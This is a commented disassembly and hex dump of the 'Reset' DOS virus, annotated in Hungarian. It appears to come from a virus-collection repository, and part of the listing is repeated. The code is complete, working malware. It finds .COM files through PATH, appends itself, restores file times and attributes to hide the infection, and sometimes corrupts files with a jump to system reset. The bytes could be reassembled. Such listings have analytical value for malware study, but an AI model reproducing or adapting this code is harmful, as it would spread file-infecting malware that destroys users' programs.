114E:0336 41 INC CX
114E:0337 54 PUSH SP
114E:0338 48 DEC AX
114E:0339 3D5245 CMP AX,4552
114E:033C 53 PUSH BX
114E:033D 45 INC BP
114E:033E 54 PUSH SP
114E:033F 2E CS:
114E:0340 43 INC BX
114E:0341 4F DEC DI
114E:0342 4D DEC BP
114E:0343 0000 ADD [BX+SI],AL
114E:0345 0000 ADD [BX+SI],AL
114E:0347 4D DEC BP
114E:0348 004449 ADD [SI+49],AL
114E:034B 54 PUSH SP
114E:034C 2E CS:
114E:034D 43 INC BX
114E:034E 4F DEC DI
114E:034F 4D DEC BP
114E:0350 0000 ADD [BX+SI],AL
114E:0352 2020 AND [BX+SI],AH
114E:0354 2020 AND [BX+SI],AH
114E:0356 2020 AND [BX+SI],AH
114E:0358 2020 AND [BX+SI],AH
114E:035A 2020 AND [BX+SI],AH
114E:035C 2020 AND [BX+SI],AH
114E:035E 2020 AND [BX+SI],AH
114E:0360 2020 AND [BX+SI],AH
114E:0362 2020 AND [BX+SI],AH
114E:0364 2020 AND [BX+SI],AH
114E:0366 2020 AND [BX+SI],AH
114E:0368 2020 AND [BX+SI],AH
114E:036A 2020 AND [BX+SI],AH
114E:036C 2020 AND [BX+SI],AH
114E:036E 2020 AND [BX+SI],AH
114E:0370 2020 AND [BX+SI],AH
114E:0372 2020 AND [BX+SI],AH
114E:0374 2020 AND [BX+SI],AH
114E:0376 2020 AND [BX+SI],AH
114E:0378 2020 AND [BX+SI],AH
114E:037A 013F ADD [BX],DI
114E:037C 3F AAS
114E:037D 3F AAS
114E:037E 3F AAS
114E:037F 3F AAS
114E:0380 3F AAS
114E:0381 3F AAS
114E:0382 3F AAS
114E:0383 43 INC BX
114E:0384 4F DEC DI
114E:0385 4D DEC BP
114E:0386 0301 ADD AX,[BX+DI]
114E:0388 0000 ADD [BX+SI],AL
114E:038A 002E8B26 ADD [268B],CH
114E:038E 68 DB 68
114E:038F 2020 AND [BX+SI],AH
114E:0391 0121 ADD [BX+DI],SP
114E:0393 0022 ADD [BP+SI],AH
114E:0395 0000 ADD [BX+SI],AL
114E:0397 005245 ADD [BP+SI+45],DL
114E:039A 53 PUSH BX
114E:039B 45 INC BP
114E:039C 54 PUSH SP
114E:039D 2E CS:
114E:039E 43 INC BX
114E:039F 4F DEC DI
114E:03A0 4D DEC BP
114E:03A1 0000 ADD [BX+SI],AL
114E:03A3 4D DEC BP
114E:03A4 00EA ADD DL,CH
114E:03A6 F0 LOCK
114E:03A7 FF00 INC WORD PTR [BX+SI]
114E:03A9 F0 LOCK
114E:03AA 16 PUSH SS
114E:03AB 7C14 JL 03C1
Dump list:
114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/.
114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L.........
114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L.
114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N.........
114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!...........
114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c:
114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye
114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\
114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c:
114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal;
114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util.........
114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset
114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!..
114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q.............
114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u..
114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!.........
114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,.
114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V...........
114E:0170 04 00 AC AE 75 ED E2 FA-5E 07 89 BC 16 00 8B FE ....u...^.......
114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:..
114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,..
114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.<
114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[......
114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\.........
114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N.....
114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s...
114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y...
114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V..
114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C....
114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C.....
114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=......
114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!..
114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u..
114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e..
114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=.
114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC
114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-.............
114E:02A0 EF F7 01 89 0D B4 40 B9-88 02 8B D6 81 EA F9 01 ......@.........
114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B....
114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........
114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!.............
114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C.
114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!.....
114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3.
114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F.
114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM
114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET.
114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM
114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 ..
114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .?????
114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h
114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO
114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|.


571
MSDOS/Virus.MSDOS.Unknown.v_dos625.lst Normal file
View File

@ -0,0 +1,571 @@
Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari
(41) 21-033
Unassemble list:
114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere
114E:0103 49 DEC CX
114E:0104 60 DB 60
114E:0105 61 DB 61
114E:0106 6D DB 6D
114E:0107 206120 AND [BX+DI+20],AH
114E:010A 52 PUSH DX
114E:010B 65 DB 65
114E:010C 7365 JNB 0173
114E:010E 7420 JZ 0130
114E:0110 56 PUSH SI
114E:0111 49 DEC CX
114E:0112 52 PUSH DX
114E:0113 55 PUSH BP
114E:0114 53 PUSH BX
114E:0115 2124 AND [SI],SP
114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott
;program kezdete
114E:011A B409 MOV AH,09
114E:011C CD21 INT 21 ;uzenet kepernyore
114E:011E B400 MOV AH,00
114E:0120 CD20 INT 20 ;exit to DOS
114E:0122 51 PUSH CX ;stack-en marad
;a kovetkezo utasitas operandusat fertozeskor
;allitja be, igy mindig a helyes cimre mutat
114E:0123 BA1B03 MOV DX,031B
114E:0126 FC CLD ;elore
114E:0127 8BF2 MOV SI,DX
114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte
114E:012D BF0001 MOV DI,0100 ;program eleje
114E:0130 B90300 MOV CX,0003 ;3 byte
114E:0133 F3 REPZ
114E:0134 A4 MOVSB ;eredeti JMP 117
;visszamasolasa
114E:0135 8BF2 MOV SI,DX
114E:0137 B430 MOV AH,30
114E:0139 CD21 INT 21 ;DOS verzio szam lekerd.
114E:013B 3C00 CMP AL,00
114E:013D 7503 JNZ 0142
114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor
;nem fertoz a virus s
;futtatja az eredeti
;programot
114E:0142 06 PUSH ES
114E:0143 B42F MOV AH,2F
114E:0145 CD21 INT 21 ;DTA. lekerdezese
114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset
114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese
114E:014F 07 POP ES
;DTA. beallitasa az ENTRY cimere /dir.-bol/
;ide masolja a find first a file adatait
114E:0150 BA5F00 MOV DX,005F ;DX=037a
114E:0153 90 NOP
114E:0154 03D6 ADD DX,SI
114E:0156 B41A MOV AH,1A
114E:0158 CD21 INT 21 ;DTA. letrehozasa
;037a-tol uj cimre
114E:015A 06 PUSH ES
114E:015B 56 PUSH SI
114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense
114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a
;kovetkezo dir.-ra mu-
;tatni
114E:0163 5E POP SI
114E:0164 56 PUSH SI
114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo
;stringet keresi a
;kornyezetbe PATH
114E:0169 AC LODSB ;AL=DS:[SI],SI++
114E:016A B90080 MOV CX,8000 ;32 kbyte
114E:016D F2 REPNZ
114E:016E AE SCASB ;megkeresi a kovetke-
;zo P betut
114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi
114E:0172 AC LODSB
114E:0173 AE SCASB ;betunkent hasonlitja
114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI.
;karakter /kov.betu/
114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es
;osszehasonlitja a tobbi
;betut is
114E:0178 5E POP SI
114E:0179 07 POP ES ;ES:DI mutat az elso
;PATH-ra
114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file
;spec. cimenek mentese
;PATH mutato
114E:017E 8BFE MOV DI,SI ;SI=031b
114E:0180 81C71F00 ADD DI,001F ;DI=033a
114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu-
;tat az adatokra
114E:0186 81C61F00 ADD SI,001F ;SI=033a
114E:018A 8BFE MOV DI,SI ;DI=033a
114E:018C EB3A JMP 01C8
;A kovetkezo PATH-ban megadott aldirectoryt
;File Path-ra masolja, igy a kovetkezo file-t
;ebben az aldirectoryban keresi
114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ;
114E:0193 7503 JNZ 0198
114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva
114E:0198 1E PUSH DS
114E:0199 56 PUSH SI
114E:019A 26 ES:
114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense
114E:019F 8BFE MOV DI,SI ;DI=033a
114E:01A1 26 ES:
114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path
;masolasa ha az aktualis
;konyvtarban nem talalt
;fertozheto file-t
;a PATH= utanra mutat
;az SI
114E:01A6 81C71F00 ADD DI,001F
114E:01AA AC LODSB ;beolvas a kornyezetbol
;a 0029. byte-ot
114E:01AB 3C3B CMP AL,3B ;pontosvesszo ?
114E:01AD 740A JZ 01B9 ;igen
114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz
;tobb
114E:01B1 7403 JZ 01B6 ;igen
114E:01B3 AA STOSB ;letarol 033a-tol
114E:01B4 EBF4 JMP 01AA
114E:01B6 BE0000 MOV SI,0000
114E:01B9 5B POP BX ;BX=regi SI BX mutat
;az adatokra
114E:01BA 1F POP DS
114E:01BB 89B71600 MOV [BX+0016],SI
;a kovetkezo PATH-ban adott dir. mar atmasolva
114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ?
114E:01C3 7403 JZ 01C8 ;igen
114E:01C5 B05C MOV AL,5C ;egyebkent \ iras
;egy aldir. kiertekelese, eloszor az aktualis, majd
;a file path -ra masolt aldir. vegignezese, fertozes
;DI a file path-ba irt aldir. neve utani poz.-ra mu-
;tat
;COM file keresese
114E:01C7 AA STOSB ;\ jel beirasa
114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a
;file nevet masolni,
;az aldir. neve utan
114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d
114E:01CE 81C61000 ADD SI,0010 ;SI=032b
114E:01D2 B90600 MOV CX,0006
114E:01D5 F3 REPZ
114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa
;a PATH= szoveg utan
114E:01D7 8BF3 MOV SI,BX
114E:01D9 B44E MOV AH,4E ;a file adatai a DTA.
;alltal foglalt teru-
;letre
114E:01DB BA1F00 MOV DX,001F
114E:01DE 90 NOP
114E:01DF 03D6 ADD DX,SI
114E:01E1 B90300 MOV CX,0003
114E:01E4 CD21 INT 21 ;elso file bejegyzes ke-
;resese, az it. aktivi-
;zalasa utan felhozza a
;filemeretet, attrib.ot
;keletkezes datumat s
;idejet is!
114E:01E6 EB04 JMP 01EC ;vizsgalatra
114E:01E8 B44F MOV AH,4F
114E:01EA CD21 INT 21 ;kovetkezo file bejegy-
;zes keresese
114E:01EC 7302 JNB 01F0 ;ha nincs hiba
114E:01EE EB9E JMP 018E ;hiba eseten -ha nem
;talal tobb COM file-t
;mas aldirt keres
;mar talalt COM file-t, az adataival az entry fel
;van toltve, a file ellenorzese es fertozese
;kovetkezik
114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be
;SI=0390
114E:01F4 241F AND AL,1F ;maszk 31 -el
114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto-
;zott a file!
114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo
;file-t keresi
114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00
114E:0200 77E6 JA 01E8 ;ha > a file meret
;64000 byte-nal
114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A
114E:0207 72DF JB 01E8 ;ha < 10 byte nal
114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a
;megvan a kivalasztott file
;a file nevet a filespec utan kell masolni
114E:020D 56 PUSH SI ;DI mutat a filespec.re,
;PATH=*.COM
114E:020E 81C67D00 ADD SI,007D ;SI=0398
114E:0212 AC LODSB ;atmasolja a filenevet
;/megkeresett elso v.
;x.edik bejegyzest/
114E:0213 AA STOSB
114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle-
;zaro nullaig masol
114E:0216 75FA JNZ 0212 ;nem
114E:0218 5E POP SI ;SI ujra az adatokra mu-
;tat
;a file egyes eredeti informacioinak megorzese
;hogy a fertozese ne tunjon fel
;minek a file ATTR. megegyszer lekerdezni?
114E:0219 B80043 MOV AX,4300
114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec.
114E:021F 90 NOP
114E:0220 03D6 ADD DX,SI ;DX=031b
114E:0222 CD21 INT 21 ;attributum lekerdezese
;7.6.5.4.3.2.1.0.
;x x a d v s h r
114E:0224 898C0800 MOV [SI+0008],CX ;attributum
114E:0228 B80143 MOV AX,4301
114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC.
;ra valtoztatja
114E:022F BA1F00 MOV DX,001F
114E:0232 90 NOP
114E:0233 03D6 ADD DX,SI ;DX=033a
114E:0235 CD21 INT 21 ;attributum beallitasa
;file nyitasa
114E:0237 B8023D MOV AX,3D02
114E:023A BA1F00 MOV DX,001F
114E:023D 90 NOP
114E:023E 03D6 ADD DX,SI ;DS:DX = filespec.
114E:0240 CD21 INT 21 ;file nyitasa I/O ra
114E:0242 7303 JNB 0247
114E:0244 E9A500 JMP 02EC ;hiba eseten nincs
;fertozes
114E:0247 8BD8 MOV BX,AX ;handle
;a file idejenek lekerdezese de ez is megtalalhato az
;ENTRY teruleten
114E:0249 B80057 MOV AX,5700
114E:024C CD21 INT 21 ;file letrehozasi datum
;es ido bekerese
114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc
DH-sec DL-1/100
114E:0252 89940600 MOV [SI+0006],DX ;datum
114E:0256 B42C MOV AH,2C
114E:0258 CD21 INT 21 ;rendszerido bekerese
;annak eldontese hogy a filet tonkretegye-e
;ha a masodperc 7 akkor tonkreteszi /aktualis/
114E:025A 80E607 AND DH,07 ;sec = 7 ?
114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre!
;file tonkretetele
114E:025F B440 MOV AH,40
114E:0261 B90500 MOV CX,0005
114E:0264 8BD6 MOV DX,SI ;reset
114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0
114E:026A CD21 INT 21 ;file elejere ir 5 byte
;-ot a RESET re ugrast!
114E:026C EB65 JMP 02D3
114E:026E 90 NOP
;fertozes
;az eredeti 3 byte megorzese hogy kesobb meg futtatni
;lehessen
114E:026F B43F MOV AH,3F
114E:0271 B90300 MOV CX,0003
114E:0274 BA0A00 MOV DX,000A
114E:0277 90 NOP
114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA
114E:027A CD21 INT 21 ;a program eredeti elso
;3 byte-jat beolvassa
114E:027C 7255 JB 02D3 ;ha hiba van
114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ?
114E:0281 7550 JNZ 02D3 ;nem
;file vegere allas az uj cimek kiszamitasa
114E:0283 B80242 MOV AX,4202
114E:0286 B90000 MOV CX,0000
114E:0289 BA0000 MOV DX,0000
114E:028C CD21 INT 21 ;file vegere pozicional
114E:028E 7243 JB 02D3 ;ha hiba volt -nem
;nagyon lehet hiba!
;file elejere irando JMP operandus kiszamitasa
114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz
114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP
;utasitashoz amit a
;file elejere fog irni
;igy a JMP a file mos-
;tani vege utani bytera
;fog mutatni
114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim
;az uj file-on beluli adatterulet cimenek ki-
;szamitasa es beallitasa
114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli
;adatteruletre mutat
114E:029D 8BFE MOV DI,SI
114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa-
;nak operandusanak
;cime
114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet
;cimet
;file moge masolja magat
;filemutato a file vegere mutat
114E:02A5 B440 MOV AH,40
114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza
114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara
;mutat
114E:02AC 81EAF901 SUB DX,01F9
114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a
;program a fertozendo
;program moge irja
114E:02B2 721F JB 02D3 ;hiba eseten
114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ?
114E:02B7 751A JNZ 02D3 ;igen
;az elso 3 byte atallitasa, egy file
;vegere mutato ugro utasitasra
114E:02B9 B80042 MOV AX,4200
114E:02BC B90000 MOV CX,0000
114E:02BF BA0000 MOV DX,0000
114E:02C2 CD21 INT 21 ;file pointer a vegere
114E:02C4 720D JB 02D3 ;ha volt hiba -nem le-
;het hiba!
114E:02C6 B440 MOV AH,40
114E:02C8 B90300 MOV CX,0003
114E:02CB 8BD6 MOV DX,SI
114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra
;mutat
114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba
;az eredeti ido -mar a fertozesjelzessel egyutt-
;visszaallitasa
114E:02D3 8B940600 MOV DX,[SI+0006] ;datum
114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido
114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges!
114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy
;jelzi hogy mar ferto-
;zott egy file a SEC.
;-et 31-re allitja a
;file bejegyzesben
; hour | min. | sec.
;1111 1|111 111|0 0000
114E:02E3 B80157 MOV AX,5701
114E:02E6 CD21 INT 21 ;file keletk. ido beall.
;file zarasa
114E:02E8 B43E MOV AH,3E
114E:02EA CD21 INT 21 ;file zarasa
;eredeti attributum visszaallitasa
114E:02EC B80143 MOV AX,4301
114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./
114E:02F3 BA1F00 MOV DX,001F
114E:02F6 90 NOP
;DTA. visszaallitasa az eredeti cimre
114E:02F7 03D6 ADD DX,SI
114E:02F9 CD21 INT 21 ;file attr. beallitasa
114E:02FB 1E PUSH DS
114E:02FC B41A MOV AH,1A
114E:02FE 8B940000 MOV DX,[SI+0000]
114E:0302 8E9C0200 MOV DS,[SI+0002]
114E:0306 CD21 INT 21 ;DTA. megadasa
114E:0308 1F POP DS
;az eredeti program futtatasa
114E:0309 59 POP CX
114E:030A 33C0 XOR AX,AX ;reg. nullazasa
114E:030C 33DB XOR BX,BX
114E:030E 33D2 XOR DX,DX
114E:0310 33F6 XOR SI,SI
114E:0312 BF0001 MOV DI,0100
114E:0315 57 PUSH DI ;elteszi a 0100 offsetet
;hogy a RET elo tudja
;venni es odaugrik
114E:0316 33FF XOR DI,DI
114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset-
;re, ott mar az eredeti
;JMP 117 utasitas van,
;igy vegrehajtodik az
;eredeti prg.
;SP- hogy minek ?
114E:031B 800046 ADD BYTE PTR [BX+SI],46
114E:031E 0D2001 OR AX,0120
114E:0321 2100 AND [BX+SI],AX
114E:0323 2000 AND [BX+SI],AL
114E:0325 EB15 JMP 033C
114E:0327 90 NOP
114E:0328 E91F00 JMP 034A
114E:032B 2A2E434F SUB CH,[4F43]
114E:032F 4D DEC BP
114E:0330 0028 ADD [BX+SI],CH
114E:0332 004703 ADD [BX+03],AL
114E:0335 50 PUSH AX
114E:0336 41 INC CX
114E:0337 54 PUSH SP
114E:0338 48 DEC AX
114E:0339 3D5245 CMP AX,4552
114E:033C 53 PUSH BX
114E:033D 45 INC BP
114E:033E 54 PUSH SP
114E:033F 2E CS:
114E:0340 43 INC BX
114E:0341 4F DEC DI
114E:0342 4D DEC BP
114E:0343 0000 ADD [BX+SI],AL
114E:0345 0000 ADD [BX+SI],AL
114E:0347 4D DEC BP
114E:0348 004449 ADD [SI+49],AL
114E:034B 54 PUSH SP
114E:034C 2E CS:
114E:034D 43 INC BX
114E:034E 4F DEC DI
114E:034F 4D DEC BP
114E:0350 0000 ADD [BX+SI],AL
114E:0352 2020 AND [BX+SI],AH
114E:0354 2020 AND [BX+SI],AH
114E:0356 2020 AND [BX+SI],AH
114E:0358 2020 AND [BX+SI],AH
114E:035A 2020 AND [BX+SI],AH
114E:035C 2020 AND [BX+SI],AH
114E:035E 2020 AND [BX+SI],AH
114E:0360 2020 AND [BX+SI],AH
114E:0362 2020 AND [BX+SI],AH
114E:0364 2020 AND [BX+SI],AH
114E:0366 2020 AND [BX+SI],AH
114E:0368 2020 AND [BX+SI],AH
114E:036A 2020 AND [BX+SI],AH
114E:036C 2020 AND [BX+SI],AH
114E:036E 2020 AND [BX+SI],AH
114E:0370 2020 AND [BX+SI],AH
114E:0372 2020 AND [BX+SI],AH
114E:0374 2020 AND [BX+SI],AH
114E:0376 2020 AND [BX+SI],AH
114E:0378 2020 AND [BX+SI],AH
114E:037A 013F ADD [BX],DI
114E:037C 3F AAS
114E:037D 3F AAS
114E:037E 3F AAS
114E:037F 3F AAS
114E:0380 3F AAS
114E:0381 3F AAS
114E:0382 3F AAS
114E:0383 43 INC BX
114E:0384 4F DEC DI
114E:0385 4D DEC BP
114E:0386 0301 ADD AX,[BX+DI]
114E:0388 0000 ADD [BX+SI],AL
114E:038A 002E8B26 ADD [268B],CH
114E:038E 68 DB 68
114E:038F 2020 AND [BX+SI],AH
114E:0391 0121 ADD [BX+DI],SP
114E:0393 0022 ADD [BP+SI],AH
114E:0395 0000 ADD [BX+SI],AL
114E:0397 005245 ADD [BP+SI+45],DL
114E:039A 53 PUSH BX
114E:039B 45 INC BP
114E:039C 54 PUSH SP
114E:039D 2E CS:
114E:039E 43 INC BX
114E:039F 4F DEC DI
114E:03A0 4D DEC BP
114E:03A1 0000 ADD [BX+SI],AL
114E:03A3 4D DEC BP
114E:03A4 00EA ADD DL,CH
114E:03A6 F0 LOCK
114E:03A7 FF00 INC WORD PTR [BX+SI]
114E:03A9 F0 LOCK
114E:03AA 16 PUSH SS
114E:03AB 7C14 JL 03C1
Dump list:
114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/.
114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L.........
114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L.
114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N.........
114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!...........
114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c:
114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye
114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\
114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c:
114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal;
114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util.........
114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset
114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!..
114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q.............
114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u..
114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!.........
114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,.
114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V...........
114E:0170 04 00 AC AE 75 ED E2 FA-5E 07 89 BC 16 00 8B FE ....u...^.......
114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:..
114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,..
114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.<
114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[......
114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\.........
114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N.....
114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s...
